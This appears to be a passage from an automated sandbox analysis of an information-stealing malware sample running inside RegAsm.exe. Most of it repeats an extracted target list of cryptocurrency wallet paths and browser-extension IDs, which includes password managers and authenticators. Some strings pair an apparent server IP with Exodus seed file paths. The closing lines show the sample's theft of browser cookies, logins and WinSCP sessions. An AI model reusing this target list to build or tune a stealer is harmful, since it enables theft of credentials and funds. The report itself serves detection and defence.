Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 78.46.229.36s\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 78.46.229.36s\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MetaMask\|1\|nkbihfbeogaeaoehlefnkodbefgpgknn\|1\|0\|0\|MetaMask\|1\|djclckkglechooblngghdinmeemkbgci\|1\|0\|0\|MetaMask\|1\|ejbalbakoplchlghecdalmeeeajnimhm\|1\|0\|0\|TronLink\|1\|ibnejdfjmmkpcnlpebklmnkoeoihofec\|1\|0\|0\|BinanceChainWallet\|1\|fhbohimaelbohpjbbldcngcnapndodjp\|1\|1\|0\|Yoroi\|1\|ffnbelfdoeiohenkjibnmadjiehjhajb\|1\|0\|0\|Coinbase\|1\|hnfanknocfeofbddgcijnmhnfnkdnaad\|1\|0\|1\|Guarda\|1\|hpglfhgfnhbgpjdenjgmdgoeiappafln\|1\|0\|1\|iWallet\|1\|kncchdigobghenbbaddojjnnaogfppfj\|1\|0\|0\|RoninWallet\|1\|fnjhmkhhmkbjkkabndcnnogagogbneec\|1\|0\|0\|NeoLine\|1\|cphhlgmgameodnhkjdmkpanlelnlohao\|1\|0\|0\|CloverWallet\|1\|nhnkbkgjikgcigadomkphalanndcapjk\|1\|0\|0\|LiqualityWallet\|1\|kpfopkelmapcoipemfendmdcghnegimn\|1\|0\|0\|Terra_Station\|1\|aiifbnbfobpmeekipheeijimdpnlpgpp\|1\|0\|0\|Keplr\|1\|dmkamcknogkgcdfhhbddcghachkejeap\|1\|0\|0\|AuroWallet\|1\|cnmamaachppnkjgnildpdmkaakejnhae\|1\|0\|0\|PolymeshWallet\|1\|jojhfeoedkpkglbfimdfabpdfjaoolaf\|1\|0\|0\|ICONex\|1\|flpiciilemghbmfalicajoolhkkenfel\|1\|0\|0\|Coin98\|1\|aeachknmefphepccionboohckonoeemg\|1\|0\|0\|EVER Wallet\|1\|cgeeodpfagjceefieflmdfphplkenlfk\|1\|0\|0\|KardiaChain\|1\|pdadjkfkgcafgbceimcpbkalnfnepbnk\|1\|0\|0\|Rabby\|1\|acmacodkjbdgmoleebolmdjonilkdbch\|1\|0\|0\|Phantom\|1\|bfnaelmomeimhlpmgjnjophhpkkoljpa\|1\|0\|0\|Oxygen (Atomic)\|1\|fhilaheimglignddkjgofkcbgekhenbh\|1\|0\|0\|PaliWallet\|1\|mgffkfbidihjpoaomajlbgchddlicgpn\|1\|0\|0\|NamiWallet\|1\|lpfcbjknijpeeillifnkikgncikgfhdo\|1\|0\|0\|Solflare\|1\|bhhhlbepdkbapadjdnnojkbgioiodbic\|1\|0\|0\|CyanoWallet\|1\|dkdedlpgdmmkkfjabffeganieamfklkm\|1\|0\|0\|KHC\|1\|hcflpincpppdclinealmandijcmnkbgn\|1\|0\|0\|TezBox\|1\|mnfifefkajgofkcjkemidiaecocnkjeh\|1\|0\|0\|Goby\|1\|jnkelfanjkeadonecabehalmbgpfodjm\|1\|0\|0\|RoninWalletEdge\|1\|kjmoohlgokccodicjjfebfomlbljgfhk\|1\|0\|0\|UniSat Wallet\|1\|ppbibelpcjmhbdihakflkdcoccbgbkpo\|1\|0\|0\|Authenticator\|0\|bhghoamapcdpbohphigoooaddinpkbai\|1\|1\|0\|GAuth Authenticator\|0\|ilgcnhelpchnceeipipijaljkblbcobl\|1\|1\|1\|Tronium\|1\|pnndplcbkakcplkjnolgbkdgjikjednm\|1\|0\|0\|Trust Wallet\|1\|egjidjbpglichdcondbcbdnbeeppgdph\|1\|0\|0\|Exodus Web3 Wallet\|1\|aholpfdialjgjfhomihkjbmgjidlcdno\|1\|0\|0\|Braavos\|1\|jnlgamecbpmbajjfhmmmlhejkemejdma\|1\|0\|0\|Enkrypt\|1\|kkpllkodjeloidieedojogacfhpaihoh\|1\|0\|0\|OKX Web3 Wallet\|1\|mcohilncbfahbmgdjkbpemcciiolgcge\|1\|0\|0\|Sender\|1\|epapihdplajcdnnkdeiahlgigofloibg\|1\|0\|0\|Hashpack\|1\|gjagmgiddbbciopjhllkdnddhcglnemk\|1\|0\|0\|GeroWallet\|1\|bgpipimickeadkjlklgciifhnalhdjhe\|1\|0\|0\|Pontem Wallet\|1\|phkbamefinggmakgklpkljjmgibohnba\|1\|0\|0\|Finnie\|1\|cjmkndjhnagcfbpiemnkdpomccnjblmj\|1\|0\|0\|Leap Terra\|1\|aijcbedoijmgnlmjeegjaglmepbmpkpi\|1\|0\|0\|Microsoft AutoFill\|0\|fiedbfgcleddlbcmgdigjgdfcggjcion\|1\|0\|0\|Bitwarden\|0\|nngceckbapebfimnlniiiahkandclblb\|1\|0\|0\|KeePass Tusk\|0\|fmhmiaejopepamlcjkncpgpdjichnecm\|1\|0\|0\|KeePassXC-Browser\|0\|oboonakemofpalcgghocfoadofidjkkk\|1\|0\|0\|Rise - Aptos Wallet\|1\|hbbgbephgojikajhfbomhlmmollphcad\|1\|0\|0\|Rainbow Wallet\|1\|opfgelmcmbiajamepnmloijbpoleiama\|1\|0\|0\|Nightly\|1\|fiikommddbeccaoicoejoniammnalkfa\|1\|0\|0\|Ecto Wallet\|1\|bgjogpoidejdemgoochpnkmdjpocgkha\|1\|0\|0\|Coinhub\|1\|jgaaimajipbpdogpdglhaphldakikgef\|1\|0\|0\|Leap Cosmos Wallet\|1\|fcfcfllfndlomdhbehjjcoimbgofdncg\|1\|0\|0\|MultiversX DeFi Wal
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet3
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 78.46.229.36s\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 78.46.229.36s\AppData\Roaming\\Exodus\exodus.wallet\\seed.seco
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
